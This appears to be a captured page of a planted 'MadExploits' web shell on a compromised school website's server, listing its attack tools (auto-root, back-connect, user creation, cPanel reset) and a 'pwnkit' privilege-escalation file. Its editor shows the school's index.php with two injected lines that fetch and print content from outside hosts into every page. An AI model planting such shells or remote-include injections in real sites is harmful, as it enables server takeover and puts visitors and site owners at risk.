Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.222.20.250
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
cheemaem /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
cheemaem
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rw-r--r--
academic.php
10.44
KB
-rw-r--r--
activity.php
2.87
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.45
KB
-rw-r--r--
config.php
626
B
-rw-r--r--
contact.php
1.81
KB
-rw-r--r--
error_log
253.28
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
6
KB
-rw-r--r--
gallery.php
1.55
KB
-rw-r--r--
header.php
11.03
KB
-rw-r--r--
index.php
18.27
KB
-rw-r--r--
news-coverage.php
1.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
tc.php
3.14
KB
-rw-r--r--
theschool.php
4.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include('header.php'); ?> <?php echo file_get_contents("https://chawhamikni.lol/sumber/303.txt"); ?> <!--Slider Start--> <div class="hero-slide owl-carousel site-blocks-cover "><?php $qurey = "SELECT * FROM `slider` WHERE status='active'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <img src="/myadmin/slider/<?php echo $row['picture']; ?>"/> <?php } ?> </div> <!--Slider End--> <div></div> <!--Trust Start--> <div class="site-section"> <div class="container-fluid"> <div class="row"> <div class="col-12"> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/santattar1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Founder</h5></a> <!--<p>Sant Attar Singh Ji, the founder of this unique institution Akal Academy, was a votary of modern scientific education duly tempered with</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/Dr-Veer-Ji1.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Directors Message</h5></a> <!--<p>All great ideas begin with a commitment to the future. Vision gives you the impulse to make the picture on your own</p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="about.php"><img src="images/principal.jpg" alt="Image" class="img-fluid"></a> <div class="category"> <a href="about.php"><h5>Principal's Message</h5></a> <!--<p>We have made Dreams transfer into thought and are striving to make the thoughts result in action. </p>--> </div> </figure> </div> <div class="col-lg-3 col-md-3 col-sm-12 trust-box"> <figure class="thumnail"> <a href="javascript:void(0)"> <img src="images/school (9).jpg" alt="Image" class="img-fluid"> </a> <div class="marquee-box"> <marquee direction="up" onmouseover="this.setAttribute('scrollamount', 0, 0); this.stop();" onmouseout="this.setAttribute('scrollamount', 6, 0); this.start();" scrollamount="6" behavior="scroll" style=" line-height: 30px;"> <?php $qurey = "SELECT * FROM `news` WHERE status='active' "; $result = mysqli_query($con, $qurey); $sr_no = 1; while ($row = mysqli_fetch_array($result)) { ?> <p class="news-scroll-content"><?php echo $sr_no . '.'; ?><?php echo $row['title']; ?></p> <?php $sr_no++; } ?> </marquee> </div> <div class="category"><h5>News/ Circular</h5></div> </figure> </div> </div> </div> </div> </div> <!--Trust End--> <!--Subscribe Start--> <div class="site-section ftco-subscribe-1" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-center"> <div class="dt-sc-margin25"></div> <div class="col-lg-12"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '1'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 style="text-align: center;"><?php echo $row['title']; ?></h2> <p style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-12"> <div class="event-box"> <a href="cbse-corner.php" class="dt-sc-button large"> Mandatory Public Disclosure<span class="fa fa-angle-right"></span></a> </div> </div> <div class="dt-sc-margin25"></div> </div> </div> </div> <!--Subscribe End--> <!--About Us Start--> <div class="section-bg style-1" style="background-image: url('images/about_1.jpg');"> <div class="container"> <div class="row"> <div class="col-lg-6"> <figure class="thumnail"> <img src="/images/gallery/school (22).jpg" alt="School Image" class="img-fluid"> </figure> </div> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '2'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline style-2"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <div class="dt-sc-margin25"></div> <blockquote class="type1"><q>Life in Akal Academy Sukhanwala focus on commitment to academic excellence, intellectual growth, arts athletics, high standards of ethical awareness, sportsmanship, and community service. Novelty and variety are added to each students life by the schools countless efforts and accessibility to a board curriculum based on value based education.</q></blockquote> <?php } ?> </div> </div> </div> </div> <!--About Us End--> <!--Why Us Start--> <div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>Our Features</span> </h2> </div> </div> <div class="row"> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-futbol-o"></span> </div> <div class="feature-1-content"> <!--<h2>Activities</h2> <p></p>--><p><a href="#" class="btn btn-primary px-4 rounded-0">Activities</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-bus"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School bus</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-users"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Kids Play Land</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-graduation-cap"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Learning</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-clock-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">School Timing</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-cloud"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Environment</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-user"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Educators</a></p> </div> </div> </div> <div class="col-lg-3 col-md-6 mb-3 mb-lg-0 feature-box"> <div class="feature-1 border"> <div class="icon-wrapper bg-primary"> <span class="fa fa-sun-o"></span> </div> <div class="feature-1-content"> <p><a href="#" class="btn btn-primary px-4 rounded-0">Daycare</a></p> </div> </div> </div> </div> </div> </div> <!--Features End--> <!--Why Us Start--> <div class="section-bg style-1"> <div class="container"> <div class="row"> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Why Choose Us?</span> </h2> <div class="dt-sc-margin25"></div><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '4' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '5' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '6' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '7' "; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <button class="accordion"><?php echo $row['title']; ?></button> <div class="panel"> <p style="text-align:justify"><?php echo $row['description']; ?></p> </div> <?php } ?> </div> <div class="col-lg-6"> <h2 class="section-title-underline style-2" style="text-align: center;"> <span>Gallery</span> </h2> <div class="dt-sc-margin25"></div> <div class="slideshow-container"> <div class="mySlides fade"> <img src="/images/gallery/school (1).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (2).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (3).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (4).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (5).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (6).jpg" style="width:100%"> </div> <div class="mySlides fade"><img src="/images/gallery/school (7).jpg" style="width:100%"> </div> <div class="mySlides fade"> <img src="/images/gallery/school (8).jpg" style="width:100%"> </div> <a class="prev" onclick="plusSlides(-1)">❮</a> <a class="next" onclick="plusSlides(1)">❯</a> </div> </div> </div> </div> </div> <!--Why Us End--> <!--opportunities Start--> <div class="section-bg"> <div class="container-fluid"> <div class="row"> <div class="col-lg-6"><?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '3'"; $result = mysqli_query($con, $qurey); while ($row = mysqli_fetch_array($result)) { ?> <h2 class="section-title-underline" style="text-align: center;"> <span><?php echo $row['title']; ?></span> </h2> <p class="lead" style="text-align:justify"><?php echo $row['description']; ?></p> <?php } ?> </div> <div class="col-lg-6"> <figure class="thumnail" style="text-align: center;"> <img src="/images/gallery/school (28).jpg" alt="School Image" class="img-fluid" width="600"> </figure> </div> </div> </div> </div> <!--opportunities End--> <!--Picture Start--> <div class="section back-box"> <div class="container-fluid"> <div class="row"> <div class="col-lg-12"> <figure class="thumnail" style="text-align: center;"> <img src="images/Tree (1).png" alt="School Image" class="img-fluid" width="800"> </figure> </div> </div> </div> </div> <!--Picture End--> <?php echo file_get_contents("https://to-brut.org/yourfile.txt"); ?> <?php include('footer.php'); ?>
Close